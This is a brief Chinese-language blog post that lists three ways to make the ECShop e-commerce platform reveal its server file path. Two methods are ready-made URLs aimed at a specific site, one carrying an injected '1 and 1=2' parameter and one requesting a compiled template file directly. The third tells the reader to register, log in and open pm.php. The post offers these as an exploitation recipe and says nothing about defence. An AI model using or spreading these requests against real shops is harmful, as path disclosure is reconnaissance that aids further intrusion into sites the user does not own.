GrayTensor 's Blog

即使赚的了全世界,却失去了自己,又有什么意义呢。

ecshop爆路径

ECSHOP暴路径漏洞利用:

1:暴路径方法一:

https://www.ya0589.com/respond.php?code=cod&attach=voucher&sp_billno=1%20and%201=2

 

2:暴路径方法二:

https://www.ya0589.com/temp/compiled/ur_here.lbi.php

 

3:暴路径方法三:
ecshop在没有整合uc_client情况下,注册一个用户,登录后访问pm.php,会爆出路径

 

评论

© GrayTensor 's Blog | Powered by LOFTER